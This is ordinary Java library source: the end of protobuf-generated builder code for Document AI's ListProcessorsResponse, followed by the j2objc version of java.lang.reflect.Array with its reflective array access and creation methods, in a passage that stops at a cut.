java.util.ArrayList<com.google.cloud.documentai.v1.Processor>(processors_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.documentai.v1.Processor, com.google.cloud.documentai.v1.Processor.Builder, com.google.cloud.documentai.v1.ProcessorOrBuilder> processorsBuilder_; /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public java.util.List<com.google.cloud.documentai.v1.Processor> getProcessorsList() { if (processorsBuilder_ == null) { return java.util.Collections.unmodifiableList(processors_); } else { return processorsBuilder_.getMessageList(); } } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public int getProcessorsCount() { if (processorsBuilder_ == null) { return processors_.size(); } else { return processorsBuilder_.getCount(); } } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public com.google.cloud.documentai.v1.Processor getProcessors(int index) { if (processorsBuilder_ == null) { return processors_.get(index); } else { return processorsBuilder_.getMessage(index); } } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public Builder setProcessors(int index, com.google.cloud.documentai.v1.Processor value) { if (processorsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureProcessorsIsMutable(); processors_.set(index, value); onChanged(); } else { processorsBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public Builder setProcessors( int index, com.google.cloud.documentai.v1.Processor.Builder builderForValue) { if (processorsBuilder_ == null) { ensureProcessorsIsMutable(); processors_.set(index, builderForValue.build()); onChanged(); } else { processorsBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public Builder addProcessors(com.google.cloud.documentai.v1.Processor value) { if (processorsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureProcessorsIsMutable(); processors_.add(value); onChanged(); } else { processorsBuilder_.addMessage(value); } return this; } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public Builder addProcessors(int index, com.google.cloud.documentai.v1.Processor value) { if (processorsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureProcessorsIsMutable(); processors_.add(index, value); onChanged(); } else { processorsBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public Builder addProcessors(com.google.cloud.documentai.v1.Processor.Builder builderForValue) { if (processorsBuilder_ == null) { ensureProcessorsIsMutable(); processors_.add(builderForValue.build()); onChanged(); } else { processorsBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public Builder addProcessors( int index, com.google.cloud.documentai.v1.Processor.Builder builderForValue) { if (processorsBuilder_ == null) { ensureProcessorsIsMutable(); processors_.add(index, builderForValue.build()); onChanged(); } else { processorsBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public Builder addAllProcessors( java.lang.Iterable<? extends com.google.cloud.documentai.v1.Processor> values) { if (processorsBuilder_ == null) { ensureProcessorsIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, processors_); onChanged(); } else { processorsBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public Builder clearProcessors() { if (processorsBuilder_ == null) { processors_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { processorsBuilder_.clear(); } return this; } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public Builder removeProcessors(int index) { if (processorsBuilder_ == null) { ensureProcessorsIsMutable(); processors_.remove(index); onChanged(); } else { processorsBuilder_.remove(index); } return this; } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public com.google.cloud.documentai.v1.Processor.Builder getProcessorsBuilder(int index) { return getProcessorsFieldBuilder().getBuilder(index); } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public com.google.cloud.documentai.v1.ProcessorOrBuilder getProcessorsOrBuilder(int index) { if (processorsBuilder_ == null) { return processors_.get(index); } else { return processorsBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public java.util.List<? extends com.google.cloud.documentai.v1.ProcessorOrBuilder> getProcessorsOrBuilderList() { if (processorsBuilder_ != null) { return processorsBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(processors_); } } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public com.google.cloud.documentai.v1.Processor.Builder addProcessorsBuilder() { return getProcessorsFieldBuilder() .addBuilder(com.google.cloud.documentai.v1.Processor.getDefaultInstance()); } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public com.google.cloud.documentai.v1.Processor.Builder addProcessorsBuilder(int index) { return getProcessorsFieldBuilder() .addBuilder(index, com.google.cloud.documentai.v1.Processor.getDefaultInstance()); } /** * * * <pre> * The list of processors. * </pre> * * <code>repeated .google.cloud.documentai.v1.Processor processors = 1;</code> */ public java.util.List<com.google.cloud.documentai.v1.Processor.Builder> getProcessorsBuilderList() { return getProcessorsFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.documentai.v1.Processor, com.google.cloud.documentai.v1.Processor.Builder, com.google.cloud.documentai.v1.ProcessorOrBuilder> getProcessorsFieldBuilder() { if (processorsBuilder_ == null) { processorsBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.documentai.v1.Processor, com.google.cloud.documentai.v1.Processor.Builder, com.google.cloud.documentai.v1.ProcessorOrBuilder>( processors_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); processors_ = null; } return processorsBuilder_; } private java.lang.Object nextPageToken_ = ""; /** * * * <pre> * Points to the next processor, otherwise empty. * </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Points to the next processor, otherwise empty. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. */ public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Points to the next processor, otherwise empty. * </pre> * * <code>string next_page_token = 2;</code> * * @param value The nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageToken(java.lang.String value) { if (value == null) { throw new NullPointerException(); } nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Points to the next processor, otherwise empty. * </pre> * * <code>string next_page_token = 2;</code> * * @return This builder for chaining. */ public Builder clearNextPageToken() { nextPageToken_ = getDefaultInstance().getNextPageToken(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * Points to the next processor, otherwise empty. * </pre> * * <code>string next_page_token = 2;</code> * * @param value The bytes for nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageTokenBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.documentai.v1.ListProcessorsResponse) } // @@protoc_insertion_point(class_scope:google.cloud.documentai.v1.ListProcessorsResponse) private static final com.google.cloud.documentai.v1.ListProcessorsResponse DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.documentai.v1.ListProcessorsResponse(); } public static com.google.cloud.documentai.v1.ListProcessorsResponse getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<ListProcessorsResponse> PARSER = new com.google.protobuf.AbstractParser<ListProcessorsResponse>() { @java.lang.Override public ListProcessorsResponse parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<ListProcessorsResponse> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<ListProcessorsResponse> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.documentai.v1.ListProcessorsResponse getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
google/j2objc
36,106
jre_emul/android/platform/libcore/ojluni/src/main/java/java/lang/reflect/Array.java
/* * Copyright (C) 2014 The Android Open Source Project * Copyright (c) 1996, 2013, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ package java.lang.reflect; /** * The {@code Array} class provides static methods to dynamically create and * access Java arrays. * * <p>{@code Array} permits widening conversions to occur during a get or set * operation, but throws an {@code IllegalArgumentException} if a narrowing * conversion would occur. * * @author Nakul Saraiya * @since 1.1 */ public final class Array { /** * Constructor. Class Array is not instantiable. */ private Array() {} /** * Creates a new array with the specified component type and * length. * Invoking this method is equivalent to creating an array * as follows: * <blockquote> * <pre> * int[] x = {length}; * Array.newInstance(componentType, x); * </pre> * </blockquote> * * <p>The number of dimensions of the new array must not * exceed 255. * * @param componentType the {@code Class} object representing the * component type of the new array * @param length the length of the new array * @return the new array * @exception NullPointerException if the specified * {@code componentType} parameter is null * @exception IllegalArgumentException if componentType is {@link * Void#TYPE} or if the number of dimensions of the requested array * instance exceed 255. * @exception NegativeArraySizeException if the specified {@code length} * is negative */ public static Object newInstance(Class<?> componentType, int length) throws NegativeArraySizeException { return newArray(componentType, length); } /** * Creates a new array * with the specified component type and dimensions. * If {@code componentType} * represents a non-array class or interface, the new array * has {@code dimensions.length} dimensions and * {@code componentType} as its component type. If * {@code componentType} represents an array class, the * number of dimensions of the new array is equal to the sum * of {@code dimensions.length} and the number of * dimensions of {@code componentType}. In this case, the * component type of the new array is the component type of * {@code componentType}. * * <p>The number of dimensions of the new array must not * exceed 255. * * @param componentType the {@code Class} object representing the component * type of the new array * @param dimensions an array of {@code int} representing the dimensions of * the new array * @return the new array * @exception NullPointerException if the specified * {@code componentType} argument is null * @exception IllegalArgumentException if the specified {@code dimensions} * argument is a zero-dimensional array, if componentType is {@link * Void#TYPE}, or if the number of dimensions of the requested array * instance exceed 255. * @exception NegativeArraySizeException if any of the components in * the specified {@code dimensions} argument is negative. */ public static Object newInstance(Class<?> componentType, int... dimensions) throws IllegalArgumentException, NegativeArraySizeException { // Android-changed: New implementation of newInstance(Class, int...). if (dimensions.length <= 0 || dimensions.length > 255) { throw new IllegalArgumentException("Bad number of dimensions: " + dimensions.length); } if (componentType == void.class) { throw new IllegalArgumentException("Can't allocate an array of void"); } if (componentType == null) { throw new NullPointerException("componentType == null"); } return createMultiArray(componentType, dimensions); } /** * Returns the length of the specified array object, as an {@code int}. * * @param array the array * @return the length of the array * @exception IllegalArgumentException if the object argument is not * an array */ // Android-changed: Non-native implementation of getLength(Object). // Android-changed: Removal of explicit throws IllegalArgumentException from method signature. public static int getLength(Object array) /* throws IllegalArgumentException */ { if (array instanceof Object[]) { return ((Object[]) array).length; } else if (array instanceof boolean[]) { return ((boolean[]) array).length; } else if (array instanceof byte[]) { return ((byte[]) array).length; } else if (array instanceof char[]) { return ((char[]) array).length; } else if (array instanceof double[]) { return ((double[]) array).length; } else if (array instanceof float[]) { return ((float[]) array).length; } else if (array instanceof int[]) { return ((int[]) array).length; } else if (array instanceof long[]) { return ((long[]) array).length; } else if (array instanceof short[]) { return ((short[]) array).length; } throw badArray(array); } /** * Returns the value of the indexed component in the specified * array object. The value is automatically wrapped in an object * if it has a primitive type. * * @param array the array * @param index the index * @return the (possibly wrapped) value of the indexed component in * the specified array * @exception NullPointerException If the specified object is null * @exception IllegalArgumentException If the specified object is not * an array * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to the * length of the specified array */ // Android-changed: Non-native implementation of get(Object, int). public static Object get(Object array, int index) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof Object[]) { return ((Object[]) array)[index]; } if (array instanceof boolean[]) { return ((boolean[]) array)[index] ? Boolean.TRUE : Boolean.FALSE; } if (array instanceof byte[]) { return Byte.valueOf(((byte[]) array)[index]); } if (array instanceof char[]) { return Character.valueOf(((char[]) array)[index]); } if (array instanceof short[]) { return Short.valueOf(((short[]) array)[index]); } if (array instanceof int[]) { return Integer.valueOf(((int[]) array)[index]); } if (array instanceof long[]) { return Long.valueOf(((long[]) array)[index]); } if (array instanceof float[]) { return new Float(((float[]) array)[index]); } if (array instanceof double[]) { return new Double(((double[]) array)[index]); } if (array == null) { throw new NullPointerException("array == null"); } throw notAnArray(array); } /** * Returns the value of the indexed component in the specified * array object, as a {@code boolean}. * * @param array the array * @param index the index * @return the value of the indexed component in the specified array * @exception NullPointerException If the specified object is null * @exception IllegalArgumentException If the specified object is not * an array, or if the indexed element cannot be converted to the * return type by an identity or widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to the * length of the specified array * @see Array#get */ // Android-changed: Non-native implementation of getBoolean(Object, int). public static boolean getBoolean(Object array, int index) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof boolean[]) { return ((boolean[]) array)[index]; } throw badArray(array); } /** * Returns the value of the indexed component in the specified * array object, as a {@code byte}. * * @param array the array * @param index the index * @return the value of the indexed component in the specified array * @exception NullPointerException If the specified object is null * @exception IllegalArgumentException If the specified object is not * an array, or if the indexed element cannot be converted to the * return type by an identity or widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to the * length of the specified array * @see Array#get */ // Android-changed: Non-native implementation of getByte(Object, int). public static byte getByte(Object array, int index) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof byte[]) { return ((byte[]) array)[index]; } throw badArray(array); } /** * Returns the value of the indexed component in the specified * array object, as a {@code char}. * * @param array the array * @param index the index * @return the value of the indexed component in the specified array * @exception NullPointerException If the specified object is null * @exception IllegalArgumentException If the specified object is not * an array, or if the indexed element cannot be converted to the * return type by an identity or widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to the * length of the specified array * @see Array#get */ // Android-changed: Non-native implementation of getChar(Object, int). public static char getChar(Object array, int index) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof char[]) { return ((char[]) array)[index]; } throw badArray(array); } /** * Returns the value of the indexed component in the specified * array object, as a {@code short}. * * @param array the array * @param index the index * @return the value of the indexed component in the specified array * @exception NullPointerException If the specified object is null * @exception IllegalArgumentException If the specified object is not * an array, or if the indexed element cannot be converted to the * return type by an identity or widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to the * length of the specified array * @see Array#get */ // Android-changed: Non-native implementation of getShort(Object, int). public static short getShort(Object array, int index) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof short[]) { return ((short[]) array)[index]; } else if (array instanceof byte[]) { return ((byte[]) array)[index]; } throw badArray(array); } /** * Returns the value of the indexed component in the specified * array object, as an {@code int}. * * @param array the array * @param index the index * @return the value of the indexed component in the specified array * @exception NullPointerException If the specified object is null * @exception IllegalArgumentException If the specified object is not * an array, or if the indexed element cannot be converted to the * return type by an identity or widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to the * length of the specified array * @see Array#get */ // Android-changed: Non-native implementation of getInt(Object, int). public static int getInt(Object array, int index) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof int[]) { return ((int[]) array)[index]; } else if (array instanceof byte[]) { return ((byte[]) array)[index]; } else if (array instanceof char[]) { return ((char[]) array)[index]; } else if (array instanceof short[]) { return ((short[]) array)[index]; } throw badArray(array); } /** * Returns the value of the indexed component in the specified * array object, as a {@code long}. * * @param array the array * @param index the index * @return the value of the indexed component in the specified array * @exception NullPointerException If the specified object is null * @exception IllegalArgumentException If the specified object is not * an array, or if the indexed element cannot be converted to the * return type by an identity or widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to the * length of the specified array * @see Array#get */ // Android-changed: Non-native implementation of getLong(Object, int). public static long getLong(Object array, int index) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof long[]) { return ((long[]) array)[index]; } else if (array instanceof byte[]) { return ((byte[]) array)[index]; } else if (array instanceof char[]) { return ((char[]) array)[index]; } else if (array instanceof int[]) { return ((int[]) array)[index]; } else if (array instanceof short[]) { return ((short[]) array)[index]; } throw badArray(array); } /** * Returns the value of the indexed component in the specified * array object, as a {@code float}. * * @param array the array * @param index the index * @return the value of the indexed component in the specified array * @exception NullPointerException If the specified object is null * @exception IllegalArgumentException If the specified object is not * an array, or if the indexed element cannot be converted to the * return type by an identity or widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to the * length of the specified array * @see Array#get */ // Android-changed: Non-native implementation of getFloat(Object, int). public static float getFloat(Object array, int index) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof float[]) { return ((float[]) array)[index]; } else if (array instanceof byte[]) { return ((byte[]) array)[index]; } else if (array instanceof char[]) { return ((char[]) array)[index]; } else if (array instanceof int[]) { return ((int[]) array)[index]; } else if (array instanceof long[]) { return ((long[]) array)[index]; } else if (array instanceof short[]) { return ((short[]) array)[index]; } throw badArray(array); } /** * Returns the value of the indexed component in the specified * array object, as a {@code double}. * * @param array the array * @param index the index * @return the value of the indexed component in the specified array * @exception NullPointerException If the specified object is null * @exception IllegalArgumentException If the specified object is not * an array, or if the indexed element cannot be converted to the * return type by an identity or widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to the * length of the specified array * @see Array#get */ // Android-changed: Non-native implementation of getDouble(Object, int). public static double getDouble(Object array, int index) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof double[]) { return ((double[]) array)[index]; } else if (array instanceof byte[]) { return ((byte[]) array)[index]; } else if (array instanceof char[]) { return ((char[]) array)[index]; } else if (array instanceof float[]) { return ((float[]) array)[index]; } else if (array instanceof int[]) { return ((int[]) array)[index]; } else if (array instanceof long[]) { return ((long[]) array)[index]; } else if (array instanceof short[]) { return ((short[]) array)[index]; } throw badArray(array); } /** * Sets the value of the indexed component of the specified array * object to the specified new value. The new value is first * automatically unwrapped if the array has a primitive component * type. * @param array the array * @param index the index into the array * @param value the new value of the indexed component * @exception NullPointerException If the specified object argument * is null * @exception IllegalArgumentException If the specified object argument * is not an array, or if the array component type is primitive and * an unwrapping conversion fails * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to * the length of the specified array */ // Android-changed: Non-native implementation of set(Object, int, Object). public static void set(Object array, int index, Object value) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (!array.getClass().isArray()) { throw notAnArray(array); } if (array instanceof Object[]) { if (value != null && !array.getClass().getComponentType().isInstance(value)) { throw incompatibleType(array); } ((Object[]) array)[index] = value; } else { if (value == null) { throw new IllegalArgumentException("Primitive array can't take null values."); } if (value instanceof Boolean) { setBoolean(array, index, ((Boolean) value).booleanValue()); } else if (value instanceof Byte) { setByte(array, index, ((Byte) value).byteValue()); } else if (value instanceof Character) { setChar(array, index, ((Character) value).charValue()); } else if (value instanceof Short) { setShort(array, index, ((Short) value).shortValue()); } else if (value instanceof Integer) { setInt(array, index, ((Integer) value).intValue()); } else if (value instanceof Long) { setLong(array, index, ((Long) value).longValue()); } else if (value instanceof Float) { setFloat(array, index, ((Float) value).floatValue()); } else if (value instanceof Double) { setDouble(array, index, ((Double) value).doubleValue()); } } } /** * Sets the value of the indexed component of the specified array * object to the specified {@code boolean} value. * @param array the array * @param index the index into the array * @param z the new value of the indexed component * @exception NullPointerException If the specified object argument * is null * @exception IllegalArgumentException If the specified object argument * is not an array, or if the specified value cannot be converted * to the underlying array's component type by an identity or a * primitive widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to * the length of the specified array * @see Array#set */ // Android-changed: Non-native implementation of setBoolean(Object, int, boolean). // Android-changed: Removal of explicit runtime exceptions throws clause. public static void setBoolean(Object array, int index, boolean z) /* throws IllegalArgumentException, ArrayIndexOutOfBoundsException */ { if (array instanceof boolean[]) { ((boolean[]) array)[index] = z; } else { throw badArray(array); } } /** * Sets the value of the indexed component of the specified array * object to the specified {@code byte} value. * @param array the array * @param index the index into the array * @param b the new value of the indexed component * @exception NullPointerException If the specified object argument * is null * @exception IllegalArgumentException If the specified object argument * is not an array, or if the specified value cannot be converted * to the underlying array's component type by an identity or a * primitive widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to * the length of the specified array * @see Array#set */ // Android-changed: Non-native implementation of setByte(Object, int, byte). public static void setByte(Object array, int index, byte b) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof byte[]) { ((byte[]) array)[index] = b; } else if (array instanceof double[]) { ((double[]) array)[index] = b; } else if (array instanceof float[]) { ((float[]) array)[index] = b; } else if (array instanceof int[]) { ((int[]) array)[index] = b; } else if (array instanceof long[]) { ((long[]) array)[index] = b; } else if (array instanceof short[]) { ((short[]) array)[index] = b; } else { throw badArray(array); } } /** * Sets the value of the indexed component of the specified array * object to the specified {@code char} value. * @param array the array * @param index the index into the array * @param c the new value of the indexed component * @exception NullPointerException If the specified object argument * is null * @exception IllegalArgumentException If the specified object argument * is not an array, or if the specified value cannot be converted * to the underlying array's component type by an identity or a * primitive widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to * the length of the specified array * @see Array#set */ // Android-changed: Non-native implementation of setChar(Object, int, char). public static void setChar(Object array, int index, char c) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof char[]) { ((char[]) array)[index] = c; } else if (array instanceof double[]) { ((double[]) array)[index] = c; } else if (array instanceof float[]) { ((float[]) array)[index] = c; } else if (array instanceof int[]) { ((int[]) array)[index] = c; } else if (array instanceof long[]) { ((long[]) array)[index] = c; } else { throw badArray(array); } } /** * Sets the value of the indexed component of the specified array * object to the specified {@code short} value. * @param array the array * @param index the index into the array * @param s the new value of the indexed component * @exception NullPointerException If the specified object argument * is null * @exception IllegalArgumentException If the specified object argument * is not an array, or if the specified value cannot be converted * to the underlying array's component type by an identity or a * primitive widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to * the length of the specified array * @see Array#set */ // Android-changed: Non-native implementation of setShort(Object, int, short). public static void setShort(Object array, int index, short s) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof short[]) { ((short[]) array)[index] = s; } else if (array instanceof double[]) { ((double[]) array)[index] = s; } else if (array instanceof float[]) { ((float[]) array)[index] = s; } else if (array instanceof int[]) { ((int[]) array)[index] = s; } else if (array instanceof long[]) { ((long[]) array)[index] = s; } else { throw badArray(array); } } /** * Sets the value of the indexed component of the specified array * object to the specified {@code int} value. * @param array the array * @param index the index into the array * @param i the new value of the indexed component * @exception NullPointerException If the specified object argument * is null * @exception IllegalArgumentException If the specified object argument * is not an array, or if the specified value cannot be converted * to the underlying array's component type by an identity or a * primitive widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to * the length of the specified array * @see Array#set */ // Android-changed: Non-native implementation of setInt(Object, int, int). public static void setInt(Object array, int index, int i) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof int[]) { ((int[]) array)[index] = i; } else if (array instanceof double[]) { ((double[]) array)[index] = i; } else if (array instanceof float[]) { ((float[]) array)[index] = i; } else if (array instanceof long[]) { ((long[]) array)[index] = i; } else { throw badArray(array); } } /** * Sets the value of the indexed component of the specified array * object to the specified {@code long} value. * @param array the array * @param index the index into the array * @param l the new value of the indexed component * @exception NullPointerException If the specified object argument * is null * @exception IllegalArgumentException If the specified object argument * is not an array, or if the specified value cannot be converted * to the underlying array's component type by an identity or a * primitive widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to * the length of the specified array * @see Array#set */ // Android-changed: Non-native implementation of setBoolean(Object, int, long). public static void setLong(Object array, int index, long l) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof long[]) { ((long[]) array)[index] = l; } else if (array instanceof double[]) { ((double[]) array)[index] = l; } else if (array instanceof float[]) { ((float[]) array)[index] = l; } else { throw badArray(array); } } /** * Sets the value of the indexed component of the specified array * object to the specified {@code float} value. * @param array the array * @param index the index into the array * @param f the new value of the indexed component * @exception NullPointerException If the specified object argument * is null * @exception IllegalArgumentException If the specified object argument * is not an array, or if the specified value cannot be converted * to the underlying array's component type by an identity or a * primitive widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to * the length of the specified array * @see Array#set */ public static void setFloat(Object array, int index, float f) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof float[]) { ((float[]) array)[index] = f; } else if (array instanceof double[]) { ((double[]) array)[index] = f; } else { throw badArray(array); } } /** * Sets the value of the indexed component of the specified array * object to the specified {@code double} value. * @param array the array * @param index the index into the array * @param d the new value of the indexed component * @exception NullPointerException If the specified object argument * is null * @exception IllegalArgumentException If the specified object argument * is not an array, or if the specified value cannot be converted * to the underlying array's component type by an identity or a * primitive widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to * the length of the specified array * @see Array#set */ // Android-changed: Non-native implementation of setDouble(Object, int, double). public static void setDouble(Object array, int index, double d) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof double[]) { ((double[]) array)[index] = d; } else { throw badArray(array); } } /* * Private */ // Android-added: Added javadocs for newArray(Class, int). /** * Returns a new array of the specified component type and length. * Equivalent to {@code new componentType[size]}. * * @throws NullPointerException * if the component type is null * @throws NegativeArraySizeException * if {@code size < 0} */ // Android-changed: Non-native implementation of newArray(Class, int). private static Object newArray(Class<?> componentType, int length) throws NegativeArraySizeException { if (!componentType.isPrimitive()) { return createObjectArray(componentType, length); } else if (componentType == char.class) { return new char[length]; } else if (componentType == int.class) { return new int[length]; } else if (componentType == byte.class) { return new byte[length]; } else if (componentType == boolean.class) { return new boolean[length]; } else if (componentType == short.class) { return new short[length]; } else if (componentType == long.class) { return new long[length]; } else if (componentType == float.class) { return new float[length]; } else if (componentType == double.class) { return new double[length]; } else if (componentType == void.class) { throw new IllegalArgumentException("Can't allocate an array of void"); } throw new AssertionError(); } // Android-removed: multiNewArray(Class, int[]) method. createMultiArray used instead. /* private static native Object multiNewArray(Class<?> componentType, int[] dimensions) throws IllegalArgumentException, NegativeArraySizeException; */ // Android-added: createMultiArray(Class, int[]) method. Used instead of multiNewArray. /* * Create a multi-dimensional array of objects with the specified type. */ private static native Object createMultiArray(Class<?> componentType, int[] dimensions) throws NegativeArraySizeException /*-[ return [IOSObjectArray arrayWithDimensions:dimensions->size_ lengths:dimensions->buffer_ type:componentType]; ]-*/; // BEGIN 